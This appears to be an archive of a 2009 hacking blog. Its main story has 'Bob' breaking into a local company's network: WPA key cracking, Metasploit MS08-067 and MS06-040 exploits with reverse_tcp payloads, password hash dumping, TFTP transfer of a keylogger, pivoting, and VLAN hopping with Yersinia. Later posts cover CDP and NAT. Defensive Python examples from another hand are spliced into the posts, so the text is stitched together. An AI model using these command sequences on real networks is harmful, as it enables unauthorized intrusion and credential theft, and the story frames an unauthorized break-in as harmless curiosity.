Saturday, October 31, 2009

Bobs Double Penetration Adventure - Part 2

So Bob decides to revisit his newfound playground at Walliford Fries and get to grips with his new tools. He connects to the Wi-Fi with the password he has already cracked, and this time, rather than using the Autopwn feature, he decides to try something else. Bob's idea is to use the PC he exploited previously as a point from which to launch other attacks deeper into the network.

Bob launches his trusty MS08-067 exploit, this time with a meterpreter/reverse_tcp payload.

use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set RHOST 192.168.1.102

set ExitOnSession False

exploit -j -z




Excellent, Bob gets his session. He connects to the session and checks the network settings on his compromised host.

sessions -i 1
execute -H -f cmd.exe -i

ipconfig




While he is on the remote host Bob checks a few things; ideally he needs to know about the network servers. At this point he just wants the basics: name and IP.

net view



And he could do with the IP addresses too; he'll want these for his scans.

ping -n 1 server01
ping -n 1 server02






That'll do for now. Bob comes out of the shell, backgrounds his meterpreter session and creates a route pointing to the internal LAN through his session.

exit
background

route add 10.0.1.0 255.255.255.0 1
route print
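The route Bob adds only works because the compromised PC sits on both the wireless network and the 10.0.1.0/24 LAN at the same time; from the defender's side, that dual-homing is the condition to hunt for. The following Python is an added example (not from the post): it parses ipconfig output into adapters and networks and flags any host that has addresses on more than one network. The ipconfig text is constructed, and the adapter and network names in it are assumptions.

```python
import ipaddress
import re

# Constructed sample (not output captured in the post): ipconfig from a Windows
# laptop that is on the corporate LAN and a wireless network at the same time.
SAMPLE_IPCONFIG = """\
Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : corp.example
   IP Address. . . . . . . . . . . . : 10.0.1.50
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1

Ethernet adapter Wireless Network Connection:

   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 192.168.2.102
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.2.1
"""

# Constructed sample of a host with one active adapter (Vista-style "IPv4 Address" label).
SAMPLE_SINGLE = """\
Windows IP Configuration

Ethernet adapter Local Area Connection:

   IPv4 Address. . . . . . . . . . . : 10.0.1.51(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1
"""

ADAPTER_RE = re.compile(r"^\S.* adapter (.+):\s*$")
IP_RE = re.compile(r"^\s*IP(?:v4)? Address[ .]*: (\d+\.\d+\.\d+\.\d+)")
MASK_RE = re.compile(r"^\s*Subnet Mask[ .]*: (\d+\.\d+\.\d+\.\d+)")


def parse_ipconfig(text):
    """Return [(adapter name, IPv4Interface)] for every adapter that has an address."""
    adapters, current = [], None
    for line in text.splitlines():
        m = ADAPTER_RE.match(line)
        if m:                                   # a new adapter section starts
            current = {"name": m.group(1), "ip": None, "mask": None}
            adapters.append(current)
            continue
        if current is None:
            continue
        m = IP_RE.match(line)
        if m:
            current["ip"] = m.group(1)
            continue
        m = MASK_RE.match(line)
        if m:
            current["mask"] = m.group(1)
    return [(a["name"], ipaddress.IPv4Interface(f"{a['ip']}/{a['mask']}"))
            for a in adapters if a["ip"] and a["mask"]]


def networks_by_adapter(text):
    """Map each distinct connected network to the adapters that sit on it."""
    nets = {}
    for name, iface in parse_ipconfig(text):
        nets.setdefault(str(iface.network), []).append(name)
    return nets


def is_dual_homed(text):
    """True when the host has addresses on more than one network, i.e. it can bridge them."""
    return len(networks_by_adapter(text)) > 1


if __name__ == "__main__":
    for label, sample in (("dual-homed laptop", SAMPLE_IPCONFIG), ("single-homed host", SAMPLE_SINGLE)):
        print(label, networks_by_adapter(sample), "ALERT" if is_dual_homed(sample) else "ok")
```

Run it against the output of `ipconfig` collected by your inventory tooling; any host reporting two networks is a candidate bridge between the wireless segment and the LAN, which is exactly the position the pivot above relies on.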



Now it's time to see if the magic works. Bob selects the auxiliary scanner and checks the OS versions of the two servers on the internal LAN by pivoting through his compromised host.

use auxiliary/scanner/smb/version
set RHOSTS 10.0.1.230

run
set RHOSTS 10.0.1.231
run



Hmmm, interesting. Windows 2003 with no service pack. Bob wonders if he can exploit that through the pivot.

use windows/smb/ms08_067_netapi
set RHOST 10.0.1.231

set PAYLOAD windows/meterpreter/reverse_tcp
exploit





Bugger! No such luck. Hang on though, Bob remembers something he read once: he can use Mubix's handy dandy deploymsf script to install Metasploit on his compromised host. Perfect!

He grabs the files he needs from the web, putting them into his plugin directory.

cd /pentest/exploits/framework3/plugins/
wget http://metasploit.com/releases/framework-3.3-dev.exe
wget http://www.room362.com/scripts-and-programs/metasploit/deploymsf.rb

And then it's just a case of connecting back to his session on the pwned box, running the script and pointing it at the Metasploit executable.

sessions -i 1
run deploymsf.rb -f ../../../pentest/exploits/framework3/plugins/framework-3.3-dev.exe




Holy crap, Batman! Look at that. Bob has installed Metasploit on the host he compromised, thanks to a weak password on the wireless LAN and a missing patch or two.



Now the output isn't always pretty, but it gets the job done.



So what's next? Well, there is that server with no service pack to take care of. For that Bob will try his old faithful ms06_040 exploit.

use windows/smb/ms06_040_netapi
set RHOST 10.0.1.231
set PAYLOAD windows/meterpreter/reverse_tcp

exploit



Perfect, another box to play with. Now Bob wants to dig in deep so he can play on this network for as long as possible, so he's going to need to start pulling together some serious information. He could get all of this manually, but of course that's pretty dumb, especially when he can use Dark Operator's excellent WinEnum script. This will go out and grab nearly everything he wants so he can understand the network better, and stick it all in one big text file so Bob has some bedtime reading. As Bob's already sitting in a meterpreter session he simply runs the WinEnum script.

run winenum




Sorted. Again it's getting late so Bob decides to call it a day. Before he does, though, he needs to leave himself a few backdoors... which will of course be in the next post.

Saturday, October 24, 2009

Bobs Double Penetration Adventure - Part 1

A couple of days ago a mate at work asked about the security issues surrounding computers that are connected to the company network and also to the Internet via a Wi-Fi connection. This question was perfect fodder for a Bob story, I thought. So the story goes...


Bob's a curious fella and he really likes to explore. Lately he's been learning about hacking, nothing evil, just really having a look in places that he shouldn't be looking, you know, a curiosity thing. As Bob sits at home it occurs to him that the perfect target for his hacking adventures is Walliford Fries, a chip maker based in his small town. He has nothing against Walliford's, he doesn't mean them any harm, he's just pissed off at the way the Wallifords are unloading their trucks at 5 in the morning and waking him up. So his intention is to see if he can get onto the Walliford network with some of these free hacking tools he's downloaded from the web and use Walliford's as his new playground.

Bob's not a traditional hacker; he doesn't go to the target's website and spend hours going through the detail, looking for business relationships, email addresses, job postings etc. He hasn't even started looking at IP ranges and ports. All Bob has done is fire up his laptop sporting a brand new install of BackTrack 4 and looked at what's about on the Wi-Fi.



That's interesting: here he has a WPA network called WF-IT that is no doubt Walliford Fries related. After all, his house is within spitting distance of the Walliford offices. Shame it's not WEP though, that could be cracked in minutes. Now Bob knows that his best bet is to customise his word list for this particular target, so he decides to scrape Walliford's website and add all those words to his wordlist.

wget -r http://www.wallifordfries.com
wyd.pl -n -o /root/temp/WF-wordlist.txt /root/www.wallifordfries.com/

cat /root/temp/WF-wordlist.txt | sort | uniq > wordlist2.txt

cat wordlist2.txt | pw-inspector -m 1 -M 20 >WF-customlist.txt


After creating his custom wordlist Bob decides to add it to an existing wordlist. As he'll need to create a hash of his wordlist to bruteforce the WPA key, he just opts for his small but popular password list; if this fails he'll have to go for the bigger wordlist he likes to call "Mother", but first he'll opt for the easy option.

cat WF-customlist.txt >>/root/temp/wordlist.txt

Bob now needs to get his wireless sniff on. He puts his wifi card into monitor mode and grabs the necessary BSSIDs of the access point and a client.

airmon-ng start wlan0 11

airodump-ng -c 11 mon0



With the BSSID of the client and the Access Point he starts his capture and saves it to a file.

airodump-ng -c 11 --bssid 00:18:F8:4B:43:86 -w /root/temp/Walliford mon0



With the capture running he sends a few de-auth packets so he can capture the 4-way handshake; this is critical for him to perform his WPA crack.

aireplay-ng -0 1 -a 00:18:F8:4B:43:86 -c 00:11:50:BB:D6:28 mon0



Great, Bob now has all he needs to begin his WPA crack. He quickly generates his hash file from the custom wordlist, hopefully all this effort will pay off.

To generate the hash he uses the genpmk tool from the cowpatty directory.

./genpmk -f /root/temp/wordlist.txt -d /root/temp/hash -s WF-IT

And to crack the key he uses cowpatty.

./cowpatty -r /root/temp/Walliford-01.cap -d /root/temp/hash -s WF-IT
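What genpmk is precomputing, and why its hash file is tied to one SSID, is worth seeing in code. As an added example (not from the post): the WPA/WPA2 PMK is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 rounds and 256 bits out, so a table built for WF-IT says nothing about any other SSID. The audit function turns the same idea around for the network owner: it checks a candidate PSK against an SSID-specific table built from words scraped off the company's own site, plus the length rules. SITE_WORDS, the word variants and the 20-character floor are this example's own assumptions; the "password"/"IEEE" value is the published IEEE 802.11i test vector.

```python
import hashlib


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK as IEEE 802.11i defines it: PBKDF2-HMAC-SHA1, the SSID as salt,
    4096 iterations, 256-bit output. This is the value genpmk precomputes per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def pmk_table(words, ssid):
    """SSID-specific table of PMK -> passphrase, the genpmk-style "hash" file.
    A table built for one SSID is useless against any other SSID."""
    return {wpa2_pmk(w, ssid): w for w in words}


def candidate_words(site_words):
    """Simple variants an auditor should assume a site-scraped wordlist covers (assumption)."""
    out = set()
    for w in site_words:
        out.update({w, w.lower(), w.capitalize(), w + "1", w + "2009"})
    return out


def audit_psk(passphrase, ssid, site_words, min_len=20):
    """Findings for a WPA/WPA2 pre-shared key; an empty list means nothing was flagged.
    The 20-character floor is this example's own policy choice, not a standard."""
    findings = []
    if not 8 <= len(passphrase) <= 63:
        findings.append("WPA passphrases must be 8 to 63 ASCII characters")
    if len(passphrase) < min_len:
        findings.append(f"shorter than {min_len} characters: cheap to guess offline")
    if wpa2_pmk(passphrase, ssid) in pmk_table(candidate_words(site_words), ssid):
        findings.append("derivable from words on the company website")
    return findings


# Constructed sample: words an auditor scraped from the company's own web pages.
SITE_WORDS = ["Walliford", "fries", "chips", "potato"]

if __name__ == "__main__":
    # Published IEEE 802.11i test vector: passphrase "password", SSID "IEEE".
    print(wpa2_pmk("password", "IEEE").hex())
    for psk in ("Walliford1", "rutabaga-lantern-71-quartz-bell"):
        print(psk, "->", audit_psk(psk, "WF-IT", SITE_WORDS) or ["no findings"])
```

The 4096 PBKDF2 rounds are the only thing slowing a wordlist attack down, so the defensive lever is keeping the passphrase out of any plausible list, not the SSID.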



Bingo! Bob got the WPA key in no time at all. He checks it by taking the card out of monitor mode and connecting to the AP.

airmon-ng stop mon0



Excellent, as soon as Bob finishes punching the air and doing his little dance he checks the wifi network for other hosts.

nmap 192.168.2.0/24 -sP



Got one, well, two if you count the Linksys AP, but let's focus on the one using the Belkin card for now. Wondering what ports it has open, Bob puts Nmap to good use, again saving the results to a file.

nmap 192.168.2.102 -sV -oA ~/temp/wal-nmap



Bob's intention is to fire up Nessus and scan his target, but first he knows a quick way to check for a vulnerability that he has a working exploit for.

nmap 192.168.2.102 -PN -T4 -p139,445 -n --script=smb-check-vulns --script-args=unsafe=1



Perfect, Nmap has told Bob that he should be able to exploit the remote PC with the Conficker exploit. He can't believe that Walliford still has PCs unpatched for this vulnerability. I guess the guys from pauldotcom are right: they have a firewall and they have AV, so they're safe, right? Wrong!

Bob confirms his findings with Nessus and checks for any other vulnerabilities that he might have some fun with.



Well, Nessus confirmed the vulnerability from his Nmap scan, which is good, but it doesn't find much else. Oh well, he saves his scan as an .nbe file so he can feed it into Metasploit.

After firing up Metasploit Bob decides to try out the db_autopwn feature to launch any exploits that it has against the ports it's found open.

db_create walliford
db_import_nessus_nbe /root/temp/walliford.nbe

db_hosts
db_autopwn -p -e -r -t




Oh, and time for another crazy dance: Bob gets a session on the remote host and he can see that he's got SYSTEM privileges, which is always nice. He dumps out the local users' hashes for some John the Ripper fun later and checks out the route table. Superb, he can see that the remote host is also connected to the Walliford LAN.

sysinfo
getuid

hashdump




At this point Bob decides to get a little interactive, so he pulls up a command prompt on the compromised host.

execute -H -f cmd.exe -i

He TFTPs a couple of handy dandy files from his laptop and grabs the hashes of any domain accounts that have logged into this box. With a hostname such as PC-IT-1 he guesses these are going to be quite useful for his exploration adventures in his new playground.

tftp -i 192.168.2.101 get cachedump.exe
tftp -i 192.168.2.101 get klogger.exe

cachedump.exe




Now he decides to have a little look around on the server. He maps a drive to the IT folder and attempts to have a poke around.

net view \\server01
net use * \\server01\IT




Damn. The NTFS permissions won't allow him access. Then it dawns on him: the SYSTEM account he is using doesn't have permissions on the server. Maybe not, but with a hostname like PC-IT-1 the logged-in user probably will. He comes out of his shell, lists the processes and then migrates to a process which is running in the context of the user.

quit
ps
getuid

migrate 784

getuid




Perfect, he's migrated to the Explorer.exe process and is now running as James. Bob launches an interactive shell again and checks his mapped drives.

execute -H -f cmd.exe -i
net use

I:




Brilliant. Bob's got access to the IT folder. From here he can have a good poke around before he decides his next move. He's got some good old-fashioned password cracking to do and time's getting on, so Bob decides to call it a day for now.

Sunday, October 18, 2009

Abusing VLANs With BackTrack

In this post I'm going to have a little fun with VLANs. As I've been studying for the CCNA cert I've been reading how great VLANs are, so in this post I'm going to have a little fun with some really cool tools from the BackTrack distro. My aim is to demonstrate why simply placing hosts in a separate VLAN might sometimes not be enough if you really don't want anyone to have access to them. Let's get started.

Tools
BackTrack
Yersinia
vconfig
Wireshark
Nmap

I start off by connecting to the LAN and getting a network address.

dhclient eth0



I can see that I'm attached to the network 10.0.1.0/24

Next I fire up wireshark and check the network for DTP (Dynamic Trunking Protocol) frames and CDP (Cisco Discovery Protocol) frames.



I can see that I have both CDP and DTP frames present.

Now I want to tell the switch that my port is a trunk port; for this I'll use Yersinia and tell it to look at DTP.

yersinia -I



After I see DTP frames appear in Yersinia I launch the attack to configure the port for trunking.



Now I need to know the VLAN number that other networks are on. Before launching Yersinia I could only see traffic from my own network (10.0.1.0/24), now I can start to see traffic from hosts on another network (192.168.2.2).



Looking at the 802.1Q information in the frame I can see that the other network is on VLAN 2.
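Both the DTP negotiation above and the tagged frames that appear afterwards are visible on the wire, and a defender can look for exactly the same things. Added example, not from the post: Python that decodes an Ethernet header, an optional 802.1Q tag (pulling out the 12-bit VLAN ID that Wireshark displays) and the Cisco LLC/SNAP header that identifies DTP, CDP and VTP, then raises alerts for traffic that should never show up on a plain access port. The frames are constructed (RFC 7042 documentation MAC addresses, dummy payloads), not captures from the lab.

```python
import struct

ETHERTYPES = {0x0800: "IPv4", 0x0806: "ARP", 0x86DD: "IPv6"}
CISCO_OUI = b"\x00\x00\x0c"
CISCO_SNAP_PIDS = {0x2000: "CDP", 0x2003: "VTP", 0x2004: "DTP"}   # SNAP protocol IDs under the Cisco OUI
CISCO_MCAST = bytes.fromhex("01000ccccccc")                       # destination used by CDP/DTP/VTP


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_frame(frame):
    """Decode the Ethernet header, optional 802.1Q tag and Cisco LLC/SNAP header of one frame."""
    dst, src, etype = struct.unpack("!6s6sH", frame[:14])
    info = {"dst": mac(dst), "src": mac(src), "vlan": None, "pcp": None, "proto": None}
    off = 14
    if etype == 0x8100:                              # 802.1Q tag: TCI then the real EtherType
        tci, etype = struct.unpack("!HH", frame[14:18])
        info["pcp"] = tci >> 13                      # 3 priority bits
        info["vlan"] = tci & 0x0FFF                  # 12-bit VLAN ID, what Wireshark shows
        off = 18
    if etype >= 0x0600:                              # Ethernet II: the field is an EtherType
        info["proto"] = ETHERTYPES.get(etype, f"ethertype-0x{etype:04x}")
    elif frame[off:off + 3] == b"\xaa\xaa\x03" and len(frame) >= off + 8:   # 802.3 length + LLC/SNAP
        oui = frame[off + 3:off + 6]
        pid = struct.unpack("!H", frame[off + 6:off + 8])[0]
        if oui == CISCO_OUI:
            info["proto"] = CISCO_SNAP_PIDS.get(pid, f"cisco-snap-0x{pid:04x}")
        else:
            info["proto"] = f"snap-{mac(oui)}-0x{pid:04x}"
    return info


# Frame builders, used only to construct the samples below.
def ethernet2(dst, src, etype, payload):
    return dst + src + struct.pack("!H", etype) + payload


def tagged(dst, src, vid, etype, payload, pcp=0):
    return dst + src + struct.pack("!HHH", 0x8100, (pcp << 13) | vid, etype) + payload


def snap_frame(dst, src, oui, pid, payload):
    llc = b"\xaa\xaa\x03" + oui + struct.pack("!H", pid) + payload
    return dst + src + struct.pack("!H", len(llc)) + llc


# Constructed samples: RFC 7042 documentation MACs and dummy payloads, not lab captures.
MAC_A = bytes.fromhex("00005e005301")
MAC_B = bytes.fromhex("00005e005302")
SAMPLE_FRAMES = [
    ("tagged ipv4", tagged(MAC_B, MAC_A, 2, 0x0800, b"\x45" + b"\x00" * 19)),
    ("dtp", snap_frame(CISCO_MCAST, MAC_A, CISCO_OUI, 0x2004, b"\x01" + b"\x00" * 29)),
    ("cdp", snap_frame(CISCO_MCAST, MAC_A, CISCO_OUI, 0x2000, b"\x02\xb4" + b"\x00" * 30)),
    ("untagged arp", ethernet2(b"\xff" * 6, MAC_A, 0x0806, b"\x00" * 28)),
]


def review_access_port(frames):
    """What a defender should flag on a port meant to be a plain access port: DTP means the
    switch will negotiate a trunk, a tag means trunking already happened, CDP means the
    switch is describing itself to whatever is plugged in."""
    alerts, vlans = [], set()
    for label, frame in frames:
        f = parse_frame(frame)
        if f["proto"] == "DTP":
            alerts.append(f"{label}: DTP from {f['src']}; fix with 'switchport mode access' + 'switchport nonegotiate'")
        elif f["proto"] == "CDP":
            alerts.append(f"{label}: CDP from {f['src']}; 'no cdp enable' on user-facing ports")
        if f["vlan"] is not None:
            vlans.add(f["vlan"])
            alerts.append(f"{label}: 802.1Q tag for VLAN {f['vlan']} seen on an access port")
    return alerts, sorted(vlans)


if __name__ == "__main__":
    for line in review_access_port(SAMPLE_FRAMES)[0]:
        print(line)
```

Fed with frames read from a pcap, the review function gives the same answer the Wireshark screenshots do, only continuously: a DTP frame on a user port is the switch advertising that the trunk negotiation above is possible.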



With this information I'll create a new interface for the new network and use vconfig to tag the frames for VLAN 2.

vconfig add eth0 2
ifconfig eth0.2 up
ifconfig eth0.2 192.168.2.200/24
ifconfig



Now I check that I can ping the host I saw with Wireshark and have a quick look at its ports with Nmap.

ping -c 2 192.168.2.2
nmap 192.168.2.2




Great, I have plenty here to play with, and on port 80 ...........




Okay, obviously this was staged, but hopefully it illustrates two things: VLANs can be abused, and Yersinia rocks!!!!!!!!!

Saturday, October 3, 2009

Discovering Devices with CDP

I touched on CDP briefly in a previous post, but here I'll talk a little more about why CDP is so great and how it can be used to help map and manage your network.

CDP stands for Cisco Discovery Protocol and is basically where your switch or router broadcasts a packet out of every interface stating some information about itself. This information includes:

  • IP Address
  • Port number
  • Port type
  • Device name
  • Device hardware
  • IOS version
  • Port speed
  • Duplex settings
  • Vlan information

That's right, all this really useful information gets thrown out of every port every minute by default and most of us just ignore it. Well, if you're a Cisco device you don't. If you're a Cisco device you'll take that information, keep it in memory and build up a neighbor database. And if you're a geek like me you can use that information to help you map your network and have some CDP fun! Here's how.
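Added example (not from the post): a parser for the CDP payload that carries the list above, so you can see the TLV layout behind `show cdp neighbors detail` and what a sniffer on a user port gets for free. The advertisement is constructed to mirror the S1 entry in this post (device ID S1, 10.0.1.210, WS-C2950-24, Switch and IGMP) and is not a real capture; the payload is what follows the LLC/SNAP header on the wire. Cisco's checksum differs from RFC 1071 for odd-length payloads, so only even lengths are verified here.

```python
import struct

TLV_NAMES = {0x0001: "device_id", 0x0002: "addresses", 0x0003: "port_id",
             0x0004: "capabilities", 0x0005: "software_version", 0x0006: "platform",
             0x0009: "vtp_domain", 0x000A: "native_vlan", 0x000B: "duplex"}
STRING_TLVS = (0x0001, 0x0003, 0x0005, 0x0006, 0x0009)
# Bit values behind the capability codes printed by 'show cdp neighbors'.
CAPABILITY_BITS = [(0x01, "Router"), (0x02, "Trans Bridge"), (0x04, "Source Route Bridge"),
                   (0x08, "Switch"), (0x10, "Host"), (0x20, "IGMP"), (0x40, "Repeater")]


def inet_checksum(data):
    """RFC 1071 ones'-complement sum over 16-bit words (a trailing odd byte is ignored)."""
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data[:len(data) & ~1]))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_addresses(value):
    """Address TLV: 4-byte count, then per address: proto type, proto length, proto, addr length, addr."""
    count = struct.unpack("!I", value[:4])[0]
    off, addrs = 4, []
    for _ in range(count):
        ptype, plen = value[off], value[off + 1]
        proto = value[off + 2:off + 2 + plen]
        alen = struct.unpack("!H", value[off + 2 + plen:off + 4 + plen])[0]
        addr = value[off + 4 + plen:off + 4 + plen + alen]
        if ptype == 1 and proto == b"\xcc" and alen == 4:      # NLPID 0xCC = IPv4
            addrs.append(".".join(str(b) for b in addr))
        off += 4 + plen + alen
    return addrs


def parse_cdp(payload):
    """Decode one CDP payload (the bytes after the LLC/SNAP header) into a neighbour record."""
    version, ttl, _ = struct.unpack("!BBH", payload[:4])
    info = {"version": version, "ttl": ttl,
            # Cisco's checksum deviates from RFC 1071 for odd lengths; leave those unverified.
            "checksum_ok": (inet_checksum(payload) == 0) if len(payload) % 2 == 0 else None}
    off = 4
    while off + 4 <= len(payload):
        tlv_type, length = struct.unpack("!HH", payload[off:off + 4])
        if length < 4 or off + length > len(payload):
            info["malformed"] = True           # bad length: stop instead of reading past the end
            break
        value = payload[off + 4:off + length]
        name = TLV_NAMES.get(tlv_type, f"tlv-0x{tlv_type:04x}")
        if tlv_type == 0x0002:
            info[name] = parse_addresses(value)
        elif tlv_type == 0x0004:
            caps = struct.unpack("!I", value)[0]
            info[name] = [label for bit, label in CAPABILITY_BITS if caps & bit]
        elif tlv_type == 0x000A:
            info[name] = struct.unpack("!H", value)[0]
        elif tlv_type == 0x000B:
            info[name] = "full" if value == b"\x01" else "half"
        elif tlv_type in STRING_TLVS:
            info[name] = value.decode("ascii", "replace")
        else:
            info[name] = value.hex()
        off += length
    return info


def tlv(tlv_type, value):
    return struct.pack("!HH", tlv_type, 4 + len(value)) + value


def build_sample_cdp():
    """Constructed advertisement modelled on the S1 entry in the post; not a real capture."""
    ip = struct.pack("!I", 1) + bytes([1, 1, 0xCC]) + struct.pack("!H", 4) + bytes([10, 0, 1, 210])
    body = (tlv(0x0001, b"S1") + tlv(0x0002, ip) + tlv(0x0003, b"FastEthernet0/1")
            + tlv(0x0004, struct.pack("!I", 0x08 | 0x20))          # Switch + IGMP
            + tlv(0x0005, b"Cisco IOS 12.1(12c)EA1") + tlv(0x0006, b"cisco WS-C2950-24")
            + tlv(0x000A, struct.pack("!H", 1)) + tlv(0x000B, b"\x01"))
    header = struct.pack("!BBH", 2, 180, 0)      # version 2, holdtime 180 s, checksum placeholder
    return struct.pack("!BBH", 2, 180, inet_checksum(header + body)) + body


if __name__ == "__main__":
    for key, val in parse_cdp(build_sample_cdp()).items():
        print(f"{key:>17}: {val}")
```

The decoded record is the same data the neighbour table keeps: the holdtime in the header is the 180 seconds the entries below expire after, and the platform and address TLVs are why the "detail" output can name the switch model and its management IP.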


Configuring CDP

Well, there's not much to configure. It's on by default and it just works.

Secure#show cdp
Global CDP information:
Sending CDP packets every 60 seconds
Sending a holdtime value of 180 seconds
Sending CDPv2 advertisements is enabled

I can see from the output above that CDP packets are sent every 60 seconds. If I wanted to send CDP packets every 30 seconds I could configure that using the following command:

Secure(config)#cdp timer 30

OK, let's see what information CDP gives us.

Secure#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
                  S - Switch, H - Host, I - IGMP, r - Repeater
Device ID        Local Intrfce     Holdtme    Capability  Platform  Port ID
S1               Eth 0              151         S I       WS-C2950-2Fas 0/17
S1               Eth 1              151         S I       WS-C2950-2Fas 0/1


Here I can see that my router's port Ethernet 0 is connected to port FastEthernet 0/17 on a 2950 switch and Ethernet 1 is connected to port FastEthernet 0/1, also on a 2950. I can also see that the Device ID is S1, which is the name of my switch. Wouldn't it be useful if I knew the IP address of the switch as well? Well, here's how we find that out.

Secure#show cdp neighbors detail
-------------------------
Device ID: S1
Entry address(es):
IP address: 10.0.1.210
Platform: cisco WS-C2950-24, Capabilities: Switch IGMP
Interface: Ethernet0, Port ID (outgoing port): FastEthernet0/17
Holdtime : 158 sec

Version : Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(12c)EA1, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Sun 24-Nov-02 23:31 by antonino

advertisement version: 2
Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000F
VTP Management Domain: ''
Duplex: full
Power drawn: 4294967.294 Watts

-------------------------

Device ID: S1
Entry address(es):
IP address: 10.0.1.210
Platform: cisco WS-C2950-24, Capabilities: Switch IGMP
Interface: Ethernet1, Port ID (outgoing port): FastEthernet0/1
Holdtime : 158 sec

Version :
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(12c)EA1, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Sun 24-Nov-02 23:31 by antonino

advertisement version: 2
Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000F
VTP Management Domain: ''
Duplex: full
Power drawn: 4294967.294 Watts


So from here I can start to diagram my network by hopping from device to device and adding in detailed information about connected devices that CDP knows about. I can see which ports are FastEthernet and which are not, which are full duplex and so much more.

So by now we're realising that this CDP information is great for an administrator but probably great for an attacker too, so let's say we don't want CDP leaving my router on interface Ethernet 1, for example. Here's how we do that.

Before I stop CDP on the router I check the switch and make sure it is working as expected.

S1#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
                  S - Switch, H - Host, I - IGMP, r - Repeater
Device ID        Local Intrfce     Holdtme    Capability  Platform  Port ID
Secure           Fas 0/17           129         R         Cisco C831Eth 0
Secure           Fas 0/1            129         R         Cisco C831Eth 1

I can see that I have 2 CDP entries as expected. Now I go to my router and stop CDP on Ethernet 1.


Secure#conf t
Secure(config)#interface ethernet 1
Secure(config-if)#no cdp enable
Secure(config-if)#exit


I go back to my switch and see what's going on there.

S1#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
                  S - Switch, H - Host, I - IGMP, r - Repeater
Device ID        Local Intrfce     Holdtme    Capability  Platform  Port ID
Secure           Fas 0/17           179         R         Cisco C831Eth 0
Secure           Fas 0/1            119         R         Cisco C831Eth 1

I can see the CDP entry is still there, but the holdtime for Eth 1 is still counting down whilst Eth 0 has refreshed after it received a packet at the 60 second period.

Finally after the 180 seconds has passed I can see the CDP entry for Eth1 drop out.

S1#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
                  S - Switch, H - Host, I - IGMP, r - Repeater
Device ID        Local Intrfce     Holdtme    Capability  Platform  Port ID
Secure           Fas 0/17           159         R         Cisco C831Eth 0

And that's about it for CDP.

NAT Overload

In this post I'll configure NAT Overload (PAT) on my Cisco router.

NAT is primarily used for the following purposes.

  • To efficiently utilise public IP addresses and slow the depletion of IP version 4 addresses.
  • To help mask the internal IP address ranges from external sources.
  • To aid in the merging of similarly addressed networks.

NAT can either be used in a one to many configuration (PAT), or a one to one configuration (Static or Dynamic). Here I'll cover NAT Overload.


When used in a one-to-many configuration the router uses the port numbers to keep track of connections. For example:

Internal - External
192.168.1.1:4567 - 80.233.1.67:4567
192.168.1.2:3458 - 80.233.1.67:3458

The same external address is used; however, the external address uses the internal address's source port number as its own source port number.
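The table above shows the straightforward case, where the inside host's port can be reused unchanged as the global port. Added example (not from the post): a small Python model of the overload translation table that keeps the inside port when it is free and allocates a fresh one when two inside hosts happen to pick the same port, together with the reverse lookup a router performs for returning packets. The 10.0.1.199 and 192.168.2.4 addresses and the ICMP identifier 768 come from the translations shown later in this post; the fallback port range and the row layout are assumptions.

```python
class PatTable:
    """Small model of NAT overload (PAT): many inside-local addresses share one inside-global
    address and are told apart by source port (for ICMP, the identifier IOS shows as a port)."""

    def __init__(self, inside_global, dynamic_ports=(1024, 65535)):
        self.inside_global = inside_global
        self.lo, self.hi = dynamic_ports      # fallback range; an assumption, not IOS's exact policy
        self.outbound = {}   # (proto, inside local ip, inside local port) -> inside global port
        self.inbound = {}    # (proto, inside global port) -> (inside local ip, inside local port)

    def _allocate(self, proto):
        for port in range(self.lo, self.hi + 1):
            if (proto, port) not in self.inbound:
                return port
        raise RuntimeError(f"no free {proto} ports left on {self.inside_global}")

    def translate_out(self, proto, src_ip, src_port):
        """Packet leaving the inside: return the (inside global ip, port) written into it."""
        key = (proto, src_ip, src_port)
        if key not in self.outbound:
            # Keep the host's own source port when nobody else holds it; only a clash forces a new one.
            taken = (proto, src_port) in self.inbound
            gport = self._allocate(proto) if taken else src_port
            self.outbound[key] = gport
            self.inbound[(proto, gport)] = (src_ip, src_port)
        return self.inside_global, self.outbound[key]

    def translate_in(self, proto, dst_port):
        """Reply arriving at the inside global address: which inside host owns that port?"""
        return self.inbound.get((proto, dst_port))

    def show(self):
        """Rows in the spirit of 'show ip nat translations' (constructed layout, not IOS output)."""
        return [f"{proto:<5} {self.inside_global}:{gport:<6} {ip}:{lport}"
                for (proto, ip, lport), gport in self.outbound.items()]


if __name__ == "__main__":
    table = PatTable("10.0.1.199")                       # pool address used later in this post
    table.translate_out("icmp", "192.168.2.4", 768)       # the ping seen in the debug output
    table.translate_out("icmp", "192.168.2.5", 768)       # second host, same identifier: a clash
    table.translate_out("tcp", "192.168.2.4", 3458)
    print("\n".join(table.show()))
    print(table.translate_in("icmp", 1024))
```

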